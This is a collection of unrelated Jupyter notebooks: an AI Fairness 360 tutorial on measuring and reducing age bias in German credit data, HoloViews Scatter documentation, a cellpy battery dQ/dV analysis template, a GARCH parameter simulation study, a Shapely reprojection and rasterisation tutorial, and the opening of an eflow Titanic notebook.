However, sometimes the patterns that are found may not be desirable or may even be illegal. For example, a loan repay model may determine that age plays a significant role in the prediction of repayment because the training dataset happened to have better repayment for one age group than for another. This raises two problems: 1) the training dataset may not be representative of the true population of people of all age groups, and 2) even if it is representative, it is illegal to base any decision on an applicant's age, regardless of whether this is a good prediction based on historical data.
AI Fairness 360 is designed to help address this problem with _fairness metrics_ and _bias mitigators_. Fairness metrics can be used to check for bias in machine learning workflows. Bias mitigators can be used to overcome bias in the workflow to produce a more fair outcome.
The loan scenario describes an intuitive example of illegal bias. However, not all undesirable bias in machine learning is illegal — it may also exist in more subtle ways. For example, a loan company may want a diverse portfolio of customers across all income levels, and thus, will deem it undesirable if they are making more loans to high income levels over low income levels. Although this is not illegal or unethical, it is undesirable for the company's strategy.
As these two examples illustrate, a bias detection and/or mitigation toolkit needs to be tailored to the particular bias of interest. More specifically, it needs to know the attribute or attributes, called _protected attributes_, that are of interest: race is one example of a _protected attribute_ and income level is a second.
### The Machine Learning Workflow
To understand how bias can enter a machine learning model, we first review the basics of how a model is created in a supervised machine learning process.

First, the process starts with a _training dataset_, which contains a sequence of instances, where each instance has two components: the features and the correct prediction for those features. Next, a machine learning algorithm is trained on this training dataset to produce a machine learning model. This generated model can be used to make a prediction when given a new instance. A second dataset with features and correct predictions, called a _test dataset_, is used to assess the accuracy of the model.
Since this test dataset is the same format as the training dataset, a set of instances of features and prediction pairs, often these two datasets derive from the same initial dataset. A random partitioning algorithm is used to split the initial dataset into training and test datasets.
Bias can enter the system in any of the three steps above. The training data set may be biased in that its outcomes may be biased towards particular kinds of instances. The algorithm that creates the model may be biased in that it may generate models that are weighted towards particular features in the input. The test data set may be biased in that it has expectations on correct answers that may be biased. These three points in the machine learning process represent points for testing and mitigating bias. In AI Fairness 360 codebase, we call these points _pre-processing_, _in-processing_, and _post-processing_.
### AI Fairness 360
We are now ready to utilize AI Fairness 360 (aif360) to detect and mitigate bias. We will use the German credit dataset, splitting it into a training and test dataset. We will look for bias in the creation of a machine learning model to predict if an applicant should be given credit based on various features from a typical credit application. The protected attribute will be "Age", with "1" and "0" being the values for the privileged and unprivileged groups, respectively.
For this first tutorial, we will check for bias in the initial training data, mitigate the bias, and recheck. More sophisticated machine learning workflows are given in the author tutorials and demo notebooks in the codebase.
Here are the steps involved
1. Import the aif360 toolkit and install it
1. Write import statements
1. Set bias detection options, load dataset, and split between train and test
1. Compute fairness metric on original training dataset
1. Mitigate bias by transforming the original dataset
1. Compute fairness metric on transformed training dataset
### Step 1
We'll install the aif360 toolkit
```
!pip install aif360
```
### Step 2
As with any python program, the first step will be to import the necessary packages. Below we import several components from the aif360 package. We import metrics to check for bias, and classes related to the algorithm we will use to mitigate bias. We also import some other non-aif360 useful packages.
```
!pip install cvxpy==0.4.11
# %matplotlib inline
# Load all necessary packages
import numpy
from aif360.datasets import GermanDataset
from aif360.metrics import BinaryLabelDatasetMetric
from aif360.algorithms.preprocessing.optim_preproc import OptimPreproc
from aif360.algorithms.preprocessing.optim_preproc_helpers.data_preproc_functions\
import load_preproc_data_german
from aif360.algorithms.preprocessing.optim_preproc_helpers.distortion_functions\
import get_distortion_german
from aif360.algorithms.preprocessing.optim_preproc_helpers.opt_tools import OptTools
# from common_utils import compute_metrics
# from aif360.datasets import BinaryLabelDataset
# from aif360.metrics.utils import compute_boolean_conditioning_vector
from IPython.display import Markdown, display
```
### Step 3 Load dataset, specifying protected attribute, and split dataset into train and test
In Step 3 we begin by downloading the dataset. Then we load the initial dataset, setting the protected attribute to be age. We then split the original dataset into training and testing datasets. Note that we use a random seed number for this demonstration, which gives us the same result for each split().
Although we will use only the training dataset in this tutorial, a normal workflow would also use a test dataset for assessing the efficacy (accuracy, fairness, etc.) during the development of a machine learning model.
Finally, we set two variables (to be used in Step 3) for the privileged (1) and unprivileged (0) values for the age attribute. These are key inputs for detecting and mitigating bias, which will be Step 3 and Step 4.
```
# Download the German credit data files into aif360's expected raw-data folder
# (the loader reads them from inside the installed package).
aif360_location = !python -c "from distutils.sysconfig import get_python_lib; print(get_python_lib())"
import os
install_loc = os.path.join(aif360_location[0], "aif360/data/raw/german/")
%cd $install_loc
!wget ftp://ftp.ics.uci.edu/pub/machine-learning-databases/statlog/german/german.data
!wget ftp://ftp.ics.uci.edu/pub/machine-learning-databases/statlog/german/german.doc
%cd -

# Load the dataset with 'age' as the protected attribute and split 70/30;
# the fixed seed makes the split reproducible.
dataset_orig = load_preproc_data_german(['age'])
numpy.random.seed(27)
dataset_orig_train, dataset_orig_test = dataset_orig.split([0.7], shuffle=True)

# age == 1 marks the privileged group, age == 0 the unprivileged group
privileged_groups = [{'age': 1}]
unprivileged_groups = [{'age': 0}]
```
### Step 4 Compute fairness metric on original training dataset
Now that we've identified the protected attribute 'age' and defined privileged and unprivileged values, we can use aif360 to detect bias in the dataset. One simple test is to compare the percentage of favorable results for the privileged and unprivileged groups, subtracting the former percentage from the latter. A negative value indicates less favorable outcomes for the unprivileged groups. This is implemented in the method called mean_difference on the BinaryLabelDatasetMetric class. The code below performs this check and displays the output, showing that the difference is -0.102466
```
# Fairness check on the original training data: difference of mean
# favorable-outcome rates, unprivileged minus privileged (negative means the
# unprivileged group receives fewer favorable outcomes).
metric_orig_train = BinaryLabelDatasetMetric(dataset_orig_train,
                                             unprivileged_groups=unprivileged_groups,
                                             privileged_groups=privileged_groups)
display(Markdown("#### Original training dataset"))
print("Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_orig_train.mean_difference())
```
### Step 5 Mitigate bias by transforming the original dataset
The previous step showed that the privileged group was getting 10.2% more positive outcomes in the training dataset. Since this is not desirable, we are going to try to mitigate this bias in the training dataset. As stated above, this is called _pre-processing_ mitigation because it happens before the creation of the model.
AI Fairness 360 implements several pre-processing mitigation algorithms. We will choose the Optimized Preprocess algorithm [1], which is implemented in "OptimPreproc" class in the "aif360.algorithms.preprocessing" directory. This algorithm will transform the dataset to have more equity in positive outcomes on the protected attribute for the privileged and unprivileged groups.
The algorithm requires some tuning parameters, which are set in the optim_options variable and passed as an argument along with some other parameters, including the 2 variables containing the unprivileged and privileged groups defined in Step 3.
We then call the fit and transform methods to perform the transformation, producing a newly transformed training dataset (dataset_transf_train). Finally, we ensure alignment of features between the transformed and the original dataset to enable comparisons.
[1] Optimized Pre-Processing for Discrimination Prevention, NIPS 2017, Flavio Calmon, Dennis Wei, Bhanukiran Vinzamuri, Karthikeyan Natesan Ramamurthy, and Kush R. Varshney
```
# Tuning options for the Optimized Preprocessing algorithm (Calmon et al.):
# the distortion function for the German dataset, the excess-distortion
# budget (epsilon), and the per-constraint thresholds (clist/dlist).
optim_options = {
    "distortion_fun": get_distortion_german,
    "epsilon": 0.1,
    "clist": [0.99, 1.99, 2.99],
    "dlist": [.1, 0.05, 0]
}

OP = OptimPreproc(OptTools, optim_options,
                  unprivileged_groups = unprivileged_groups,
                  privileged_groups = privileged_groups)

# Learn the transformation on the training data, apply it (transforming the
# labels too), then align features/labels with the original dataset so the
# two can be compared directly.
OP = OP.fit(dataset_orig_train)
dataset_transf_train = OP.transform(dataset_orig_train, transform_Y = True)
dataset_transf_train = dataset_orig_train.align_datasets(dataset_transf_train)
```
### Step 6 Compute fairness metric on transformed dataset
Now that we have a transformed dataset, we can check how effective it was in removing bias by using the same metric we used for the original training dataset in Step 4. Once again, we use the function mean_difference in the BinaryLabelDatasetMetric class. We see the mitigation step was very effective, the difference in mean outcomes is now 0.001276 . So we went from a 10.2% advantage for the privileged group to a 0.1% advantage for the unprivileged group.
```
# Re-run the same fairness metric on the transformed training data to see how
# much of the mean-outcome gap the mitigation removed.
metric_transf_train = BinaryLabelDatasetMetric(dataset_transf_train,
                                               unprivileged_groups=unprivileged_groups,
                                               privileged_groups=privileged_groups)
display(Markdown("#### Transformed training dataset"))
print("Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_transf_train.mean_difference())
```
### Summary
The purpose of this tutorial is to give a new user to bias detection and mitigation a gentle introduction to some of the functionality of AI Fairness 360. A more complete use case would take the next step and see how the transformed dataset impacts the accuracy and fairness of a trained model. This is implemented in the demo notebook in the examples directory of toolkit, called demo_optim_data_preproc.ipynb. I highly encourage readers to view that notebook as it is generalization and extension of this simple tutorial.
There are many metrics one can use to detect the presence of bias. AI Fairness 360 provides many of them for your use. Since it is not clear which of these metrics to use, we also provide some guidance. Likewise, there are many different bias mitigation algorithms one can employ, many of which are in AI Fairness 360. Other tutorials will demonstrate the use of some of these metrics and mitigations algorithms.
As mentioned earlier, both fairness metrics and mitigation algorithms can be performed at various stages of the machine learning pipeline. We recommend checking for bias as often as possible, using as many metrics as are relevant for the application domain. We also recommend incorporating bias detection in an automated continuous integration pipeline to ensure bias awareness as a software project evolves.
| github_jupyter |
<div class="contentcontainer med left" style="margin-left: -50px;">
<dl class="dl-horizontal">
<dt>Title</dt> <dd> Scatter Element</dd>
<dt>Dependencies</dt> <dd>Bokeh</dd>
<dt>Backends</dt>
<dd><a href='./Scatter.ipynb'>Bokeh</a></dd>
<dd><a href='../matplotlib/Scatter.ipynb'>Matplotlib</a></dd>
<dd><a href='../plotly/Scatter.ipynb'>Plotly</a></dd>
</dl>
</div>
```
import numpy as np
import holoviews as hv
from holoviews import dim
hv.extension('bokeh')
```
The ``Scatter`` element visualizes as markers placed in a space of one independent variable, traditionally denoted as *x*, against a dependent variable, traditionally denoted as *y*. In HoloViews, the name ``'x'`` is the default dimension name used in the key dimensions (``kdims``) and ``'y'`` is the default dimension name used in the value dimensions (``vdims``). We can see this from the default axis labels when visualizing a simple ``Scatter`` element:
```
np.random.seed(42)
coords = [(i, np.random.random()) for i in range(20)]
scatter = hv.Scatter(coords)
scatter.opts(color='k', marker='s', size=10)
```
Here the random *y* values are considered to be the 'data' whereas the x positions express where those values are located (compare this to how [``Points``](./Points.ipynb) elements are defined). In this sense, ``Scatter`` can be thought of as a [``Curve``](./Curve.ipynb) without any lines connecting the samples and you can use slicing to view the *y* values corresponding to a chosen *x* range:
```
scatter[0:12] + scatter[12:20]
```
A ``Scatter`` element must always have at least one value dimension but that doesn't mean additional value dimensions aren't supported. Here is an example with two additional quantities for each point, declared as the ``vdims`` ``'z'`` and ``'size'`` visualized as the color and size of the dots, respectively:
```
np.random.seed(10)
data = np.random.rand(100,4)
scatter = hv.Scatter(data, vdims=['y', 'z', 'size'])
scatter = scatter.opts(color='z', size=dim('size')*20)
scatter + scatter[0.3:0.7, 0.3:0.7].hist('z')
```
In the right subplot, the ``hist`` method is used to show the distribution of samples along our first value dimension, (``'y'``).
The marker shape specified above can be any supported by [matplotlib](http://matplotlib.org/api/markers_api.html), e.g. ``s``, ``d``, or ``o``; the other options select the color and size of the marker. For convenience with the [bokeh backend](../../../user_guide/Plotting_with_Bokeh.ipynb), the matplotlib marker options are supported using a compatibility function in HoloViews.
**Note**: Although the ``Scatter`` element is superficially similar to the [``Points``](./Points.ipynb) element (they can generate plots that look identical), the two element types are semantically quite different: ``Scatter`` is used to visualize data where the *y* variable is *dependent*, whereas ``Points`` visualizes data where both variables are independent. This semantic difference also explains why the histogram generated by the ``hist`` call above visualizes the distribution of a different dimension than it does for [``Points``](./Points.ipynb).
This difference means that ``Scatter`` naturally combines with elements that express dependent variables in two-dimensional space, such as the ``Chart`` types like [``Curve``](./Curve.ipynb). Similarly, ``Points`` express an independent relationship in two dimensions and combine naturally with [``Raster``](./Raster.ipynb) types such as [``Image``](./Image.ipynb).
For full documentation and the available style and plot options, use ``hv.help(hv.Scatter)``.
| github_jupyter |
# Processing cellpy batch - ica
### `{{cookiecutter.project_name}}::{{cookiecutter.session_id}}`
**Experimental-id:** `{{cookiecutter.notebook_name}}`
**Short-name:** `{{cookiecutter.session_id}}`
**Project:** `{{cookiecutter.project_name}}`
**By:** `{{cookiecutter.author_name}}`
**Date:** `{{cookiecutter.date}}`
## Imports and setup
```
import os
import pathlib
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import holoviews as hv
from holoviews.core.io import Pickler, Unpickler
import hvplot.pandas
from holoviews import opts
import cellpy
from cellpy import prms
from cellpy import prmreader
from cellpy.utils import batch, helpers, plotutils, ica
%matplotlib inline
hv.extension('bokeh')
pd.set_option('display.max_columns', 70)
print(f"cellpy version: {cellpy.__version__}")
cellpy_batch_file = "cellpy_batch_" + "{{cookiecutter.session_id}}" + ".json"
b = batch.from_journal(cellpy_batch_file)
b.link()
cell_labels = b.experiment.cell_names
print(" cell labels: ")
cell_labels
# # Remove bad cycles (if you have saved it to the journal session)
# helpers.yank_outliers(b, remove_indexes=b.journal.session["bad_cycles"])
# # It is usually nice to see the capacity plot in the same notebook.
# # You can use the b.plot_summary() method or plotutils.bplot e.g.
# plotutils.bplot(b, columns=["charge_capacity"], max_cycle=100)
```
## Plotting
This will output an interactive ica plot for the first 100 cycles of each cell.
```
# Build one overlaid dQ/dV (incremental capacity) curve per cell, covering the
# first 100 cycles; cells whose extraction fails are reported and skipped.
ica_curves = dict()
cycles = range(1, 101)
for label in b.experiment.cell_names:
    print(label)
    d = b.experiment.data[label]
    try:
        tidy_ica = ica.dqdv_frames(d, cycle=cycles, voltage_resolution=0.005)
    except Exception as e:
        # Catch only real errors — a bare `except:` would also swallow
        # KeyboardInterrupt/SystemExit — and report why this cell failed.
        print(f"[{label} unsuccessful: {e}]")
    else:
        ica_curve = hv.Curve(
            tidy_ica,
            kdims=['voltage', 'cycle'],
            vdims=['dq'],
            label="Incremental capacity plot",
        ).groupby("cycle").overlay().opts(show_legend=False)
        ica_curves[label] = ica_curve
# Arrange the per-cell overlays in a 3-column layout, one panel per cell label.
NdLayout_ica = hv.NdLayout(ica_curves, kdims='label').cols(3)
palette = 'Spectral'
# Colour the per-cycle curves with the chosen palette, add hover tooltips and
# restrict the voltage axis; panels do not share axes.
NdLayout_ica.opts(
    hv.opts.Curve(color=hv.Palette(palette), tools=['hover'], xlim=(0.05,0.8)),
    hv.opts.NdOverlay(shared_axes=False),
    hv.opts.NdLayout()
)
```
## Tweaking dQ/dV parameters
```
cell_id = b.experiment.cell_names[0]
c = b.experiment.data[cell_id]
cycle_number = 4
cycle = c.get_cap(cycle=cycle_number, categorical_column=True, method="forth-and-forth", insert_nan=False)
voltage_1, incremental_1 = ica.dqdv_cycle(cycle)
curve1 = hv.Curve((voltage_1, incremental_1), label="one").opts(width=800, xlabel="Voltage", ylabel="dqdv")
curve1
voltage_2, incremental_2 = ica.dqdv_cycle(cycle, voltage_resolution=0.01)
curve2 = hv.Curve((voltage_2, incremental_2), label="two").opts(width=800, xlabel="Voltage", ylabel="dqdv")
curve1 * curve2
```
## Making and saving dQ/dV to html and pickle for later use
```
# Export the dQ/dV evolution for one cell to html and to a holoviews pickle.
cell_id = b.experiment.cell_names[0]
c = b.experiment.data[cell_id]
# Cycles to include in the evolution plot.
cycle = [1, 2, 10, 20]
# Bug fix: this call used to pass `cycle=cycles` (the range(1, 101) left over
# from an earlier cell), silently ignoring the `cycle` list defined just above.
tidy_ica = ica.dqdv_frames(c, cycle=cycle, voltage_resolution=0.005, normalizing_factor=1)
curves = hv.Curve(tidy_ica, kdims=['voltage', 'cycle'], vdims=['dq']).groupby("cycle").overlay()
# setting options using the hv.opts API
curves.opts(
    hv.opts.Curve(
        color=hv.Cycle('Category20'),
    ),
    hv.opts.NdOverlay(
        title=f"Evolution [{cell_id}]",
        show_legend=True,
        legend_position="right",
        width=600,
        xlim=(0, 1),
        ylim=(-10, 5),
        ylabel="dQ/dV",
    ),
)
fig_label = f"{{cookiecutter.session_id}}_{cell_id}_ica_evolution"
# export to html:
hv.save(
    curves,
    f"out/{fig_label}.html",
    toolbar=True
)
# save as pickle (can be loaded in other notebooks)
Pickler.save(curves, f"out/{fig_label}.hvz",)
```
## Saving dQ/dV to csv files
This can be useful for plotting with other plotting software
```
# Saving the dQ/dV data for the three first cycles (formation) for all cells except the last
out = pathlib.Path("data/processed")
# Make sure the output directory exists before writing any csv files.
out.mkdir(parents=True, exist_ok=True)
ica_curves = dict()
cycles = [1, 2, 3]
selected_cell_labels = cell_labels[:-1]  # skipping the last cell
for label in selected_cell_labels:
    print(label)
    d = b.experiment.data[label]
    try:
        wide_ica = ica.dqdv_frames(d, cycle=cycles, voltage_resolution=0.005, tidy=False)
    except Exception as e:
        # A bare `except:` would also hide KeyboardInterrupt; report the reason instead.
        print(f"[{label} unsuccessful: {e}]")
    else:
        fname = f"{label}_ica_formation.csv"
        wide_ica.to_csv(out / fname, sep=";", index=False)
        print(f" -> saved to {out / fname}")
```
## Links
### Notebooks
- notes and information [link](00_{{cookiecutter.notebook_name}}_notes.ipynb)
- processing raw data [link](01_{{cookiecutter.notebook_name}}_loader.ipynb)
- life [link](02_{{cookiecutter.notebook_name}}_life.ipynb)
- cycles [link](03_{{cookiecutter.notebook_name}}_cycles.ipynb)
- ica [link](04_{{cookiecutter.notebook_name}}_ica.ipynb)
- plots [link](05_{{cookiecutter.notebook_name}}_plots.ipynb)
| github_jupyter |
# Geospatial operations with Shapely: Round-Trip Reprojection, Affine Transformations, Rasterisation, and Vectorisation
Sometimes we want to take a geospatial object and transform it to a new coordinate system, and perhaps translate and rotate it by some amount. We may want to rasterise the object for raster operations. We'd like to do this all with Shapely geometry object so we have access to all their useful methods.
```
import json, geojson, pyproj
from shapely import geometry
from shapely.ops import transform
from shapely.affinity import affine_transform
from functools import partial
from skimage import measure
from scipy.ndimage.morphology import binary_dilation
from PIL import Image, ImageDraw
import numpy as np
import matplotlib.pyplot as plt
```
## Reprojection-Affine-Rasterisation roundtrip
We're going to:
- take a shapely polygon with lon/lat coordinates, say the building footprint of the Oxford School of Geography and the Environment (SOGE)
- convert it to UTM coordinates
- draw it on a 1km raster with Oxford's Carfax tower landmarking the bottom left corner.
```
# grab a quick geojson from geojson.io
feature = json.loads("""{
"type": "Feature",
"properties": {},
"geometry": {
"type": "Polygon",
"coordinates": [
[
[
-1.2537717819213867,
51.75935044524217
],
[
-1.2541741132736204,
51.75922759060092
],
[
-1.2538844347000122,
51.75860999193512
],
[
-1.2542277574539185,
51.75844728980553
],
[
-1.2540507316589353,
51.75822813907169
],
[
-1.2531226873397827,
51.75858342836217
],
[
-1.2537717819213867,
51.75935044524217
]
]
]
}
}""")
# load the polygon:
SOGE = geometry.shape(feature['geometry'])
```
### Forward and Reverse Projection
We want to convert the geometry from lon/lat to a cartesian coordinate system. Let's use Universal Transfer Mercator with units in m. The UTM projection is arranged in 'zones' to keep angles and shapes conformal in images.
```
# A function to grab the UTM zone number for any lat/lon location
def get_utm_zone(lat, lon):
    """Return the UTM zone number (as a string) for a lat/lon location.

    Uses the standard 6-degree-wide longitudinal zones, with the usual
    exceptions for south-west Norway (zone 32) and Svalbard (31/33/35/37).
    """
    # Svalbard latitude band: zones are irregular between 0 and 42 deg E.
    if 72. <= lat < 84.:
        for west, east, zone in ((0., 9., '31'), (9., 21., '33'),
                                 (21., 33., '35'), (33., 42., '37')):
            if west <= lon < east:
                return zone
    # South-west Norway is folded into zone 32.
    elif 56. <= lat < 64. and 3. <= lon < 12.:
        return '32'
    # Regular case: one zone per 6 degrees of longitude, starting at 180W.
    return str(int((lon + 180) / 6) + 1)
# get the UTM zone using the centroid of the polygon
utm_zone = get_utm_zone(SOGE.centroid.y, SOGE.centroid.x)
# define the native WGS84 lon/lat projection
proj_wgs = pyproj.Proj("+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs")
# define the UTM projection using the utm zone
proj_utm = pyproj.Proj(proj='utm',zone=utm_zone,ellps='WGS84')
# create reprojection functions using functools.partial
reproj_wgs_utm = partial(pyproj.transform, proj_wgs, proj_utm)
reproj_utm_wgs = partial(pyproj.transform, proj_utm, proj_wgs)
# use shapely.transform with the reprojection functions to reproject shapely objects
SOGE_utm = transform(reproj_wgs_utm, SOGE)
# Check the reverse transform with a tolerance of 1e-9 of a decimal degree
print (SOGE.almost_equals(transform(reproj_utm_wgs, SOGE_utm), 1e-9))
```
### Affine Transformation
Now let's say we want to get a sense of the footprint of the School of Geography on a square kilometer of Oxford, with the bottom-left corner centered on Carfax tower. We want to create a mask of the building footprint on a numpy array.
<div>
<img src="https://user-images.githubusercontent.com/22874837/74949464-b52dec00-53f5-11ea-9107-53d91c93d70c.png" width="500"/>
</div>
```
# Point for Carfax tower
carfax = geometry.Point(-1.25812, 51.7519)
# Convert the point to utm
carfax_utm = transform(reproj_wgs_utm,carfax)
# use the utm point as the lower-left coordinate for a shapely box
oxford_box = geometry.box(carfax_utm.x, carfax_utm.y, carfax_utm.x+1000, carfax_utm.y+1000)
# visualise
fig, ax = plt.subplots(1,1,figsize=(4,4))
ax.plot(*SOGE_utm.exterior.xy,c='b')
ax.scatter(carfax_utm.x, carfax_utm.y, c='k')
ax.plot(*oxford_box.exterior.xy,c='g')
plt.show()
```
We'll choose the pixel resolution of our numpy array to be 25m. We'll use a [shapely affine transformation](https://shapely.readthedocs.io/en/latest/manual.html#affine-transformations) with a geotransform to transform the shape to pixel coordinates. *Note!* The Shapely Geotransform matrix is different from that of many other spatial packages (e.g. GDAL, PostGIS).
```
# Define the geotransform matrix
a = e = 1/25 # stretch along-axis 25m/px
b = d = 0 # rotate across-axis 0m/px
x_off = - carfax_utm.x / 25 # offset from cartesian origin in pixel coordinates
y_off = - carfax_utm.y / 25 # offset from cartesian origin in pixel coordinates
GT = [a,b,d,e,x_off,y_off] # GeoTransform Matrix
# Apply GeoTransform
SOGE_pix = affine_transform(SOGE_utm,GT)
```
### Rasterising
Lastly, let's say we want to rasterise our converted polygons to create a numpy array mask. Let's use PIL to draw our polygon on a numpy array.
```
# initialise a numpy array
SOGE_mask = np.zeros((int(1000/25), int(1000/25))) # 1000m / 25m/px
# create an Image object
im = Image.fromarray(mask, mode='L')
# create an ImageDraw object
draw = ImageDraw.Draw(im)
# draw the polygon
draw.polygon(list(SOGE_pix.exterior.coords), fill=255)
# un-draw any holes in the polygon...
for hole in SOGE_pix.interiors:
draw.polygon(list(hole.coords), fill=0)
# return the image object to the mask array
SOGE_mask = np.array(im)
# visualise
fix, ax = plt.subplots(1,1,figsize=(4,4))
ax.imshow(SOGE_mask, origin='lower')
ax.plot(*SOGE_pix.exterior.xy, c='g')
plt.show()
```
### Vectorising
To complete the round-trip, let's perform a raster operation (say, a [simple binary dilation](https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.morphology.binary_dilation.html)), then re-vectorise our polygon and get it all the way back to native lat-lon coordinates. We'll use a vectoriser built with [skimage.measure.find_contours](https://scikit-image.org/docs/dev/api/skimage.measure.html#skimage.measure.find_contours).
```
def vectoriser(arr, disp=2):
    """
    input: arr -> a square 2D binary mask array
    output: polys -> a list of vectorised polygons in pixel coordinates
    """
    polys = []
    # Pad the mask with `disp` pixels of zeros so find_contours closes contours
    # around blobs touching the array edge; coordinates are shifted back below.
    contours = measure.find_contours(np.pad(arr,disp,'constant', constant_values=(0)), 0.0001)
    for c in contours:
        c = (c-disp).clip(0.,float(arr.shape[0])) # clip back extraneous geometries introduced by the padding
        c = np.round(c) # round to int
        c.T[[0, 1]] = c.T[[1, 0]] # swap (row, col) -> (x, y) ordering
        poly = geometry.Polygon(c) # pass into geometry
        polys.append(poly)
    return polys
# grab the 0th element in the list of polygons
SOGE_dialated = vectoriser(binary_dilation(SOGE_mask>0))[0]
# Visualise
fig, ax = plt.subplots(1,1,figsize=(6,6))
ax.imshow(binary_dilation(SOGE_mask),origin='lower')
ax.plot(*SOGE_dialated.exterior.xy)
plt.show()
```
Now we need to convert this polygon in the pixel coordinate system back to the UTM coordinate system, and finally back to lon/lat. We do this by first reversing the affine transformation, and then reversing the projection.
```
# Inverse geotransform: undo the 1/25 scale and add back the Carfax offset.
# Forward was x_pix = (x - carfax.x)/25, so the inverse is x = 25*x_pix + carfax.x.
GT_rev = [1/a,b,d,1/e,carfax_utm.x, carfax_utm.y]
# visualise the dilated polygon against the originals in both coordinate systems
fig, axs = plt.subplots(1,2,figsize=(12,6))
#utm polygons
axs[0].plot(*affine_transform(SOGE_dialated, GT_rev).exterior.xy,c='r')
axs[0].plot(*SOGE_utm.exterior.xy, c='b')
axs[0].plot(*oxford_box.exterior.xy,c='g')
#lon/lat polygons (reverse-projected from UTM)
axs[1].plot(*transform(reproj_utm_wgs,affine_transform(SOGE_dialated, GT_rev)).exterior.xy,c='r')
axs[1].plot(*transform(reproj_utm_wgs,SOGE_utm).exterior.xy, c='b')
axs[1].plot(*transform(reproj_utm_wgs,oxford_box).exterior.xy,c='g')
plt.show()
```
| github_jupyter |
```
import sys
sys.path.insert(1, 'C:/Users/peter/Desktop/volatility-forecasting/midas')
from volatility import GARCH
from weights import Beta
from base import BaseModel
from helper_functions import create_matrix
import pandas as pd
import numpy as np
import time
import statsmodels.api as sm
def create_sim(sim_num = 500, sim_length = 500):
    """Monte-Carlo study of GARCH(1,1) parameter estimates.

    Simulates `sim_num` series of length `sim_length`, refits the model to
    each, and returns five arrays (one entry per replication): optimised
    log-likelihood, the estimates alpha0/alpha1/beta1, and fit runtime (s).
    """
    lls, alpha0, alpha1, beta1, runtime = np.zeros(sim_num), np.zeros(sim_num), np.zeros(sim_num), np.zeros(sim_num), np.zeros(sim_num)
    model = GARCH(plot = False)
    for i in range(sim_num):
        np.random.seed(i)  # one fixed seed per replication for reproducibility
        y, _ = model.simulate(num = sim_length)
        start = time.time()
        # NOTE(review): ['', '01', '01', '01'] appears to be a lag/spec selector
        # for each parameter — confirm against the project's GARCH.fit docs.
        model.fit(['', '01', '01', '01'], y)
        runtime[i] = time.time() - start
        # print("{}st iteration's runTime: {} sec.\n".format(i+1, round(runtime[i], 4)))
        lls[i], alpha0[i], alpha1[i], beta1[i] = model.opt.fun, model.optimized_params[1], model.optimized_params[2], model.optimized_params[3]
    return lls, alpha0, alpha1, beta1, runtime
# Run the Monte-Carlo study for four sample sizes; transpose so each row is
# one simulation and the columns are (ll, alpha0, alpha1, beta1, runtime).
sim500 = pd.DataFrame(create_sim(sim_length = 500)).T
sim1000 = pd.DataFrame(create_sim(sim_length = 1000)).T
sim2000 = pd.DataFrame(create_sim(sim_length = 2000)).T
sim5000 = pd.DataFrame(create_sim(sim_length = 5000)).T
def _fit_kde(values):
    # Helper: fit a univariate kernel density estimate to a parameter sample.
    kde = sm.nonparametric.KDEUnivariate(values)
    kde.fit()
    return kde

# Column 1 = alpha0, column 2 = alpha1, column 3 = beta1; one fit per sample size.
alpha0_500 = _fit_kde(sim500.iloc[:, 1].values)
alpha0_1000 = _fit_kde(sim1000.iloc[:, 1].values)
alpha0_2000 = _fit_kde(sim2000.iloc[:, 1].values)
alpha0_5000 = _fit_kde(sim5000.iloc[:, 1].values)
alpha1_500 = _fit_kde(sim500.iloc[:, 2].values)
alpha1_1000 = _fit_kde(sim1000.iloc[:, 2].values)
alpha1_2000 = _fit_kde(sim2000.iloc[:, 2].values)
alpha1_5000 = _fit_kde(sim5000.iloc[:, 2].values)
beta1_500 = _fit_kde(sim500.iloc[:, 3].values)
beta1_1000 = _fit_kde(sim1000.iloc[:, 3].values)
beta1_2000 = _fit_kde(sim2000.iloc[:, 3].values)
beta1_5000 = _fit_kde(sim5000.iloc[:, 3].values)
import matplotlib.pyplot as plt  # bug fix: pyplot is used below but was never imported in this notebook

# One row per parameter: (LaTeX label, true value, KDE fits ordered by sample size).
_panels = [
    (r'$\alpha_0$', 0.2, (alpha0_500, alpha0_1000, alpha0_2000, alpha0_5000)),
    (r'$\alpha_1$', 0.2, (alpha1_500, alpha1_1000, alpha1_2000, alpha1_5000)),
    (r'$\beta_1$', 0.6, (beta1_500, beta1_1000, beta1_2000, beta1_5000)),
]
fig, ax = plt.subplots(3, 1, figsize=(10, 8), tight_layout=True)
for axis, (symbol, actual, kdes) in zip(ax, _panels):
    for n, kde in zip((500, 1000, 2000, 5000), kdes):
        axis.plot(kde.support, kde.density, lw=3, label=f'N = {n}', zorder=10)
    axis.set_title(symbol + f" (Act = {actual}) parameter's density from different samples size")
    axis.grid(True, zorder=-5)
    axis.set_xlim((0.0, 1.0))
    axis.legend(loc='best')
plt.savefig('C:/Users/peter/Desktop/volatility-forecasting/results/garch_sim.png')
plt.show()
sim500.to_csv('C:/Users/peter/Desktop/volatility-forecasting/results/garch_500.csv')
sim1000.to_csv('C:/Users/peter/Desktop/volatility-forecasting/results/garch_1000.csv')
sim2000.to_csv('C:/Users/peter/Desktop/volatility-forecasting/results/garch_2000.csv')
sim5000.to_csv('C:/Users/peter/Desktop/volatility-forecasting/results/garch_5000.csv')
```
| github_jupyter |
Find the markdown blocks that say interaction required! The notebook should take care of the rest!
# Import libs
```
import sys
import os
sys.path.append('..')
from eflow.foundation import DataPipeline,DataFrameTypes
from eflow.data_analysis import FeatureAnalysis, NullAnalysis
from eflow.model_analysis import ClassificationAnalysis
from eflow.data_pipeline_segments import FeatureTransformer, TypeFixer, DataEncoder, FeatureDataCleaner
from eflow.utils.modeling_utils import optimize_model_grid
from eflow.utils.eflow_utils import get_type_holder_from_pipeline, remove_unconnected_pipeline_segments
from eflow.utils.math_utils import get_unbalanced_threshold
from eflow.utils.sys_utils import create_dir_structure
from eflow.utils.eflow_utils import create_color_dict_for_features
from eflow.utils.pandas_utils import missing_values_table,data_types_table, value_counts_table, suggest_removal_features
from eflow.widgets import ColorLabelingWidget
import pandas as pd
import numpy as np
import scikitplot as skplt
import matplotlib.pyplot as plt
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
import copy
from IPython.display import clear_output
from IPython.core.getipython import get_ipython
import ipython_blocking
# # Additional add ons
# !pip install pandasgui
# !pip install pivottablejs
# clear_output()
%matplotlib notebook
%matplotlib inline
```
## Declare Project Variables
### Interaction required
```
dataset_path = "Datasets/titanic_train.csv"
